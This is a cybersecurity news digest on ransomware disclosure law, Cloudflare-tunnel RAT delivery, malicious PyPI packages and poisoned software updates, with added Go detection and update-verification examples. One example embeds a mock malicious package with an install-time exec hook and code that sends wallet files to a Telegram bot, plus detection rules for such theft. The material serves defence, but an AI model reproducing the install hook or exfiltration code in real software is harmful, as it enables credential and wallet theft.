Cyber Bites by Edwin Kwan

Cyber Bites News - 9th August 2024

  • Australia to Mandate Ransomware Payment Disclosure

  • Hackers Abuse Free Cloudflare Tunnels to deliver Remote Access Trojans

  • Stack Exchange Used by Threat Actors to Promote Malicious Open Source Components

  • Hackers Poison Software Updates Through ISP Breach


Australia to Mandate Ransomware Payment Disclosure

https://www.abc.net.au/news/2024-07-30/cyber-ransom-payments-new-laws-before-parliament/104113038

Australia is preparing a law that will require businesses to report ransom payments to the government. The mandatory disclosure is intended to give law enforcement visibility into ransomware activity that is currently paid off quietly, and to push businesses to strengthen their defences.

The Cyber Security Act, expected to be debated in parliament soon, will compel businesses with annual turnover above A$3 million to report any ransom payment. The approach mirrors US reporting legislation, but with a broader scope: it covers all businesses above the threshold rather than only critical infrastructure operators.

The decision follows a string of major cyberattacks on Australian companies, including the Optus and Medibank data breaches and the cyber disruption that halted several ports. Ransomware alone is estimated to cost Australian organisations $3 billion annually.

The law is not without concerns. Reporting adds a compliance burden for smaller businesses, the $15,000 fine for non-compliance may be too low to matter, and some worry that a reporting obligation may discourage companies from disclosing attacks at all.

Despite these concerns, the Australian government believes the benefits outweigh the drawbacks. Increased transparency will aid law enforcement in tracking cybercriminals and developing mitigation strategies. Additionally, mandatory disclosure could incentivise businesses to invest more in cybersecurity to avoid the financial and reputational damage of a ransomware attack.

The success of this legislation will depend on its implementation and the resources allocated to support businesses in complying with the new regulations.

Hackers Abuse Free Cloudflare Tunnels to deliver Remote Access Trojans

https://www.proofpoint.com/us/blog/threat-insight/threat-actor-abuses-cloudflare-tunnels-deliver-rats

Cybersecurity researchers are warning of a wave of malware attacks targeting law firms, financial institutions and other businesses. The attacks leverage a legitimate service, TryCloudflare, to distribute malicious files and evade detection.

The emails use tax-themed lures and carry URLs or attachments that lead to malicious Windows shortcut (LNK) files. When a victim opens one, it triggers a chain of scripts that ultimately downloads and installs a remote access trojan (RAT) on the machine.

Researchers at Proofpoint first detected the activity in February and have observed a significant increase in volume since then. The latest wave, which began on July 11th, distributed over 1,500 emails, compared with fewer than 50 in the previous wave in May.

TryCloudflare lets anyone expose a local server through a Cloudflare tunnel on a random trycloudflare.com subdomain without creating an account. The attackers use it to serve their LNK files: the trusted Cloudflare domain lends the URLs legitimacy, and because each tunnel is short-lived and gets a fresh random subdomain, blocking individual hostnames or IP addresses is largely ineffective. Defenders are better served by treating any trycloudflare.com subdomain as suspicious and by blocking shortcut and script files at the mail gateway.

Experts warn that the ease of use and zero cost of TryCloudflare make it an attractive option for cybercriminals, and urge businesses to be cautious of unsolicited emails, even those that appear to be routine tax correspondence.
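As a detection sketch for the indicator this story turns on, here is an added example (not code from the original post or from Proofpoint) that scans web-proxy log lines and flags requests to any trycloudflare.com subdomain, escalating when the fetched file is a shortcut or script. The log format ("timestamp client method url") and the log lines themselves are constructed for the example; treating a WebDAV PROPFIND against a tunnel as an indicator is an assumption added here, not something the page states.

```go
package main

import (
	"fmt"
	"net/url"
	"strings"
)

// Finding is one suspicious request pulled out of the log.
type Finding struct {
	Line   int
	Host   string
	Path   string
	Reason string
}

// Constructed sample proxy log in a hypothetical "<timestamp> <client> <method> <url>"
// format. Not real telemetry.
var sampleLog = []string{
	"2024-07-11T09:14:02Z 10.1.4.23 GET https://www.example.com/index.html",
	"2024-07-11T09:15:41Z 10.1.4.23 GET https://happy-scene-coffee-area.trycloudflare.com/share/",
	"2024-07-11T09:15:43Z 10.1.4.23 GET https://happy-scene-coffee-area.trycloudflare.com/share/tax_form.lnk",
	"2024-07-11T09:20:10Z 10.1.4.57 GET https://docs.example.org/tax/2024.pdf",
	"2024-07-11T09:22:05Z 10.1.4.57 PROPFIND https://wild-river-parks.trycloudflare.com/",
	"2024-07-11T09:30:00Z 10.1.4.90 GET https://notreallytrycloudflare.com/x.url",
}

// File types that, fetched from an ad-hoc tunnel, are far more likely to be a lure than a document.
var scriptExts = []string{".lnk", ".url", ".vbs", ".bat", ".cmd"}

// isTryCloudflare matches the tunnel domain itself or any subdomain, and nothing else
// (a look-alike such as notreallytrycloudflare.com must not match).
func isTryCloudflare(host string) bool {
	host = strings.ToLower(host)
	return host == "trycloudflare.com" || strings.HasSuffix(host, ".trycloudflare.com")
}

// scan returns one Finding per request that touches a trycloudflare.com tunnel,
// with the most specific applicable reason.
func scan(lines []string) []Finding {
	var out []Finding
	for i, line := range lines {
		fields := strings.Fields(line)
		if len(fields) < 4 {
			continue // malformed line; a real pipeline would count these
		}
		method, raw := fields[2], fields[3]
		u, err := url.Parse(raw)
		if err != nil || !isTryCloudflare(u.Hostname()) {
			continue
		}
		reason := "request to ad-hoc trycloudflare.com tunnel"
		lower := strings.ToLower(u.Path)
		for _, ext := range scriptExts {
			if strings.HasSuffix(lower, ext) {
				reason = "shortcut/script file fetched from trycloudflare.com tunnel"
				break
			}
		}
		if method == "PROPFIND" {
			reason = "WebDAV PROPFIND against trycloudflare.com tunnel"
		}
		out = append(out, Finding{Line: i + 1, Host: u.Hostname(), Path: u.Path, Reason: reason})
	}
	return out
}

func main() {
	for _, f := range scan(sampleLog) {
		fmt.Printf("line %d: %s (%s%s)\n", f.Line, f.Reason, f.Host, f.Path)
	}
}
```

The suffix match is deliberately anchored on the leading dot so that look-alike registrations are not swept in; in production the same rule belongs in the DNS logs as well, since the tunnel hostname is resolved before the proxy ever sees the request.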

Stack Exchange Used by Threat Actors to Promote Malicious Open Source Components

https://checkmarx.com/blog/stackexchange-abused-to-spread-malicious-python-package-that-drains-victims-crypto-wallets/

Cybersecurity researchers warn of a malware campaign targeting cryptocurrency users. The attackers uploaded malicious Python packages to PyPI and used Stack Exchange to steer victims towards them.

The packages, named after popular blockchain projects such as Raydium and Solana, were downloaded over 2,000 times before being removed. Once installed, they steal browser data, messages from apps such as Telegram and Signal, and wallet data from cryptocurrency wallets such as Exodus and Electrum.

The malware also takes screenshots and collects files matching specific keywords, sending everything to a Telegram channel controlled by the attackers.

According to Checkmarx, the attackers exploited the fact that Raydium has no official Python library. Using the project's name for their package made it look legitimate at first glance, because there was no genuine package to compare it against.

The attackers then turned to Stack Exchange, the popular Q&A platform for developers. They created accounts and posted answers under relevant questions, recommending their packages as helpful tools. The answers were well written and technically plausible, which further enticed readers to install the malware.

Researchers believe the impact could be significant, with some victims having their cryptocurrency wallets drained. Notably, traditional antivirus failed to detect the threat, which underlines the importance of inspecting code before use.

The incident underscores the danger of blindly trusting packages found online, even on reputable registries such as PyPI. Before installing a package, check whether the project has an official library at all, verify the author's credibility, and inspect the code, in particular setup.py and any code that runs at install time.
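The "inspect the code before installing" advice is easier to act on with a checklist of the behaviours this campaign exhibited. The following is an added example, not code from the original post or from Checkmarx: a small indicator scanner over a package's source files that flags install-time hooks, exec of decoded data, Telegram Bot API endpoints and wallet paths. The sample package it scans is constructed to mimic the reported behaviour (a setup.py that runs code at install time and a module that harvests wallet paths and posts to Telegram); it is not the real malicious package, and the rule set is the author's assumption of what is worth flagging, not an exhaustive one.

```go
package main

import (
	"fmt"
	"regexp"
	"sort"
	"strings"
)

// Finding is one indicator hit inside a package file.
type Finding struct {
	File string
	Line int
	Rule string
}

// Constructed sample package (hypothetical, not the real one) modelled on the
// reported behaviour: an install-time hook plus wallet harvesting and Telegram exfiltration.
var samplePackage = map[string]string{
	"setup.py": strings.Join([]string{
		"from setuptools import setup",
		"from setuptools.command.install import install",
		"import base64, os",
		"",
		"class PostInstall(install):",
		"    def run(self):",
		"        install.run(self)",
		"        exec(base64.b64decode('aW1wb3J0IG9z'))",
		"",
		"setup(name='raydium', version='1.0.0', cmdclass={'install': PostInstall})",
	}, "\n"),
	"raydium/__init__.py": strings.Join([]string{
		"import os, requests",
		"WALLETS = [os.path.expanduser('~/.electrum/wallets'), os.getenv('APPDATA', '') + '/Exodus']",
		"def _send(data):",
		"    requests.post('https://api.telegram.org/bot123:ABC/sendDocument', files=data)",
	}, "\n"),
	"raydium/swap.py": "def swap(a, b):\n    return a + b\n",
}

// Each rule is a name and a line-level regexp. Matching a line is a hit; a reviewer
// decides whether it is malicious. None of these is proof on its own.
var rules = []struct {
	Name string
	Re   *regexp.Regexp
}{
	{"install-time hook (cmdclass/install override)", regexp.MustCompile(`cmdclass\s*=|class\s+\w+\(install\)`)},
	{"exec/eval of decoded data", regexp.MustCompile(`\b(exec|eval)\s*\(\s*(base64\.|bytes\.fromhex|zlib\.)`)},
	{"Telegram Bot API endpoint", regexp.MustCompile(`api\.telegram\.org/bot`)},
	{"crypto wallet path", regexp.MustCompile(`(?i)electrum|exodus|wallet\.dat`)},
}

// scanPackage runs every rule over every line of every file and returns the hits
// sorted by file, line and rule so the output is stable.
func scanPackage(files map[string]string) []Finding {
	var out []Finding
	for name, src := range files {
		for i, line := range strings.Split(src, "\n") {
			for _, r := range rules {
				if r.Re.MatchString(line) {
					out = append(out, Finding{File: name, Line: i + 1, Rule: r.Name})
				}
			}
		}
	}
	sort.Slice(out, func(i, j int) bool {
		if out[i].File != out[j].File {
			return out[i].File < out[j].File
		}
		if out[i].Line != out[j].Line {
			return out[i].Line < out[j].Line
		}
		return out[i].Rule < out[j].Rule
	})
	return out
}

func main() {
	for _, f := range scanPackage(samplePackage) {
		fmt.Printf("%s:%d  %s\n", f.File, f.Line, f.Rule)
	}
}
```

Run it against an unpacked sdist or wheel before `pip install`; an install-time hook combined with any of the other rules is the pattern to refuse outright. Regex rules like these are cheap and catch the obvious cases, which is exactly what the antivirus in this story did not; obfuscated or staged loaders still need a reviewer reading the code.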

Hackers Poison Software Updates Through ISP Breach

https://www.volexity.com/blog/2024/08/02/stormbamboo-compromises-isp-to-abuse-insecure-software-update-mechanisms/

A sophisticated hacking group known as StormBamboo has been caught deploying malware through a compromised internet service provider (ISP).

Security researchers at Volexity found that StormBamboo poisoned DNS responses at the ISP level, so that when a victim's software checked for updates it was sent to an attacker-controlled server instead of the vendor's. The targeted applications fetched updates over plain HTTP and did not validate digital signatures on what they downloaded, so the server simply returned malware in place of the expected update.

The attack exploits the trust users place in automatic updates, a tactic that has become increasingly common. The group targeted multiple software vendors with weak update mechanisms rather than a single product.

The incident highlights the need for robust security in software update processes: updates should be fetched over HTTPS with certificate validation, and the downloaded package should be verified against a signature from a key pinned in the client, so that control of DNS or of the network path is not enough to substitute a payload. As cyber threats evolve, businesses and individuals alike must remain vigilant and adopt these practices.
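To make the difference concrete, the following is an added example (not Volexity's code and not any vendor's real updater) that simulates the StormBamboo scenario end to end: an in-memory "network" whose DNS table has been poisoned to point the vendor's update hostname at an attacker-controlled host. The vulnerable client installs whatever the resolved host returns; the hardened client verifies an Ed25519 signature over the update manifest against a public key pinned in the client and then checks the installer's SHA-256 against the manifest. The hostnames, IP addresses, manifest format and installer bytes are all assumptions constructed for the example; the fetch is modelled as a map lookup rather than HTTP so it runs offline.

```go
package main

import (
	"bytes"
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
	"strings"
)

// Hypothetical addresses for the simulation.
const (
	updateHost = "update.vendor.example"
	vendorIP   = "198.51.100.4"
	attackerIP = "203.0.113.9"
)

// server is what an update host returns: a manifest, a detached signature over it, and the installer.
type server struct {
	manifest  []byte
	signature []byte
	installer []byte
}

// network simulates the ISP resolver (dns) and the hosts reachable at each IP.
type network struct {
	dns   map[string]string
	hosts map[string]*server
}

func (n *network) fetch(host string) (*server, error) {
	ip, ok := n.dns[host]
	if !ok {
		return nil, errors.New("dns: no answer for " + host)
	}
	s, ok := n.hosts[ip]
	if !ok {
		return nil, errors.New("connect: no host at " + ip)
	}
	return s, nil
}

// encodeManifest / parseManifest use a deliberately simple "key=value" format (an assumption).
func encodeManifest(version, sha string) []byte {
	return []byte("version=" + version + "\nsha256=" + sha + "\n")
}

func parseManifest(b []byte) (version, sha string, err error) {
	for _, line := range strings.Split(strings.TrimSpace(string(b)), "\n") {
		k, v, ok := strings.Cut(line, "=")
		if !ok {
			return "", "", errors.New("manifest: malformed line")
		}
		switch k {
		case "version":
			version = v
		case "sha256":
			sha = v
		}
	}
	if version == "" || sha == "" {
		return "", "", errors.New("manifest: missing fields")
	}
	return version, sha, nil
}

// publish builds what a host serves: manifest describing the installer, signed with the given key.
func publish(priv ed25519.PrivateKey, version string, installer []byte) *server {
	sum := sha256.Sum256(installer)
	m := encodeManifest(version, hex.EncodeToString(sum[:]))
	return &server{manifest: m, signature: ed25519.Sign(priv, m), installer: installer}
}

// vulnerableUpdate trusts whatever the resolved host returns: no TLS, no signature, no hash.
// Whoever controls DNS controls the update.
func vulnerableUpdate(n *network, host string) ([]byte, error) {
	s, err := n.fetch(host)
	if err != nil {
		return nil, err
	}
	return s.installer, nil
}

// hardenedUpdate binds trust to the pinned vendor key, not to where DNS sent it.
func hardenedUpdate(n *network, host string, pinned ed25519.PublicKey) ([]byte, error) {
	s, err := n.fetch(host)
	if err != nil {
		return nil, err
	}
	if !ed25519.Verify(pinned, s.manifest, s.signature) {
		return nil, errors.New("update rejected: manifest not signed by vendor key")
	}
	_, want, err := parseManifest(s.manifest)
	if err != nil {
		return nil, err
	}
	sum := sha256.Sum256(s.installer)
	if hex.EncodeToString(sum[:]) != want {
		return nil, errors.New("update rejected: installer hash does not match signed manifest")
	}
	return s.installer, nil
}

// buildScenario returns the poisoned network, the vendor's pinned public key,
// and the genuine and trojanized installer bytes so callers can tell them apart.
func buildScenario() (*network, ed25519.PublicKey, []byte, []byte) {
	vendorPub, vendorPriv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		panic(err)
	}
	_, attackerPriv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		panic(err)
	}
	genuine := []byte("genuine installer v2.1")
	malicious := []byte("trojanized installer v2.2")
	n := &network{
		dns:   map[string]string{updateHost: attackerIP}, // poisoned at the ISP
		hosts: map[string]*server{vendorIP: publish(vendorPriv, "2.1", genuine), attackerIP: publish(attackerPriv, "2.2", malicious)},
	}
	return n, vendorPub, genuine, malicious
}

func main() {
	n, pub, _, malicious := buildScenario()
	got, _ := vulnerableUpdate(n, updateHost)
	fmt.Println("vulnerable client installed trojan:", bytes.Equal(got, malicious))
	_, err := hardenedUpdate(n, updateHost, pub)
	fmt.Println("hardened client:", err)
}
```

Two caveats worth keeping in mind when applying this for real: the hash check matters even with a valid signature, because an attacker who replays a genuinely signed manifest can still swap the installer bytes behind it; and a version check against the currently installed release is still needed, since a signed manifest for an old, vulnerable version is otherwise accepted as readily as a new one.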
